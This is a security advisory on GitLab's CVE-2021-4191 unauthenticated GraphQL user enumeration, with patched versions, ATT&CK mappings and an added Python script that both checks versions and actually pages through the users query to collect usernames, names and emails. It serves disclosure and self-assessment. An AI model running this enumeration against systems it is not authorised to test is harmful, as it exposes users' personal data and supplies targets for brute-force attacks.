Thousands of GitLab instances impacted by multiple security flaws

THREAT LEVEL: Amber.

Researchers have disclosed multiple security vulnerabilities in GitLab, the open-source DevOps platform. The most significant lets an unauthenticated remote attacker enumerate the instance's registered users (usernames, names and email addresses), which hands the attacker a ready-made target list for password-guessing and brute-force attacks against those accounts.

CVE-2021-4191 is the most prominent of the issues fixed in this release. It is an information disclosure vulnerability caused by a missing authentication check on certain GitLab GraphQL API queries: a remote, unauthenticated client can issue a users query and receive the usernames, names and email addresses of registered GitLab users. A Metasploit module that automates this enumeration is publicly available, so exploitation in the wild is likely.

Organizations running self-managed GitLab CE or EE should update to 14.8.2, 14.7.4 or 14.6.5 (or a later release in the same branch) to remediate these vulnerabilities. GitLab.com already runs the patched version.
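The following is an added self-assessment script for the two points above (the unauthenticated GraphQL user enumeration and the fixed-version list); it is not GitLab's code and not the Metasploit module. It assumes, as the page does not state, that the GraphQL endpoint is `/api/graphql`, that the exposed query is the paginated `users` query with `username`, `name` and `publicEmail` fields, and that responses follow the usual GraphQL `{"data": ..., "errors": ...}` envelope. The sample responses are constructed, not captured traffic.

```python
"""Check a GitLab instance for CVE-2021-4191 style unauthenticated user enumeration
and compare its version against the patched releases named in the advisory.

Added example; not GitLab's code or the Metasploit module. Assumptions: endpoint
/api/graphql, the `users` query shape below, and the standard GraphQL envelope.
"""
import json
import re
import sys
import urllib.request

# First patched release per GitLab branch, from the advisory.
FIXED = {(14, 8): (14, 8, 2), (14, 7): (14, 7, 4), (14, 6): (14, 6, 5)}


def parse_version(text):
    """Turn strings such as '14.7.3-ee' or 'GitLab 14.8.1' into (14, 7, 3)."""
    m = re.search(r"(\d+)\.(\d+)\.(\d+)", text)
    if not m:
        raise ValueError(f"no version found in {text!r}")
    return tuple(int(x) for x in m.groups())


def is_patched(version):
    """True when the version carries the fix for this security release."""
    v = parse_version(version)
    branch = v[:2]
    if branch in FIXED:
        return v >= FIXED[branch]
    # Branches after 14.8 were cut after the fix; anything older than 14.6
    # received no hotpatch and must upgrade.
    return branch > (14, 8)


def build_query(after=None, page_size=100):
    """JSON body for one page of the users query (query shape is an assumption)."""
    cursor = f', after: "{after}"' if after else ""
    query = (
        f"{{ users(first: {page_size}{cursor}) "
        "{ pageInfo { hasNextPage endCursor } "
        "nodes { username name publicEmail } } }"
    )
    return json.dumps({"query": query})


def classify(response):
    """Decide from one response whether user data was returned to an
    unauthenticated client. Returns ('exposed', rows) or ('not_exposed', []).
    A null/empty users field or an errors entry is the refusal a patched
    instance gives, so it is treated as not exposed."""
    users_field = (response.get("data") or {}).get("users")
    nodes = (users_field or {}).get("nodes") or []
    rows = [(n.get("username"), n.get("name"), n.get("publicEmail")) for n in nodes]
    if rows:
        return "exposed", rows
    return "not_exposed", []


def enumerate_users(base_url, max_pages=50):
    """Walk the paginated users query without credentials; return all rows seen."""
    after, found = None, []
    for _ in range(max_pages):
        req = urllib.request.Request(
            base_url.rstrip("/") + "/api/graphql",
            data=build_query(after).encode(),
            headers={"Content-Type": "application/json"},
        )
        with urllib.request.urlopen(req, timeout=15) as resp:
            body = json.load(resp)
        verdict, rows = classify(body)
        found.extend(rows)
        page = ((body.get("data") or {}).get("users") or {}).get("pageInfo") or {}
        if verdict != "exposed" or not page.get("hasNextPage"):
            break
        after = page["endCursor"]
    return found


# Constructed sample responses (illustrative, not captured traffic).
SAMPLE_VULNERABLE = {"data": {"users": {
    "pageInfo": {"hasNextPage": False, "endCursor": "abc"},
    "nodes": [
        {"username": "root", "name": "Administrator", "publicEmail": ""},
        {"username": "jdoe", "name": "Jane Doe", "publicEmail": "jdoe@example.com"},
    ]}}}
SAMPLE_PATCHED = {"data": {"users": None},
                  "errors": [{"message": "constructed refusal message"}]}

if __name__ == "__main__":
    if len(sys.argv) < 2:
        print("usage: gitlab_user_enum_check.py https://gitlab.example.com [version]")
        sys.exit(2)
    rows = enumerate_users(sys.argv[1])
    print(f"{len(rows)} user records returned to an unauthenticated client")
    if len(sys.argv) > 2:
        print("version patched:", is_patched(sys.argv[2]))
```

Run it only against instances you are authorised to test; a non-zero record count means the instance still answers the users query without authentication, and a version below the fixed release for its branch should be upgraded regardless of what the query returns. Because the enumeration is the same traffic an attacker generates, unauthenticated POSTs to `/api/graphql` whose body contains a `users(` query are also a reasonable signal to alert on in web-server or reverse-proxy logs.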

Potential MITRE ATT&CK TTPs are:

TA0001: Initial Access

T1190: Exploit Public-Facing Application

TA0007: Discovery

T1087: Account Discovery

TA0006: Credential Access

T1110: Brute Force

Vulnerability Detail

Patch Link

https://gitlab.com/gitlab-org/omnibus-gitlab/-/tree/14.8.2-Security-Hotpatches/config/patches/gitlab-rails

https://about.gitlab.com/update/

https://docs.gitlab.com/runner/install/linux-repository.html#updating-the-runner

References

https://about.gitlab.com/releases/2022/02/25/critical-security-release-gitlab-14-8-2-released/

https://github.com/rapid7/metasploit-framework/pull/16252

https://www.rapid7.com/blog/post/2022/03/03/cve-2021-4191-gitlab-graphql-api-user-enumeration-fixed/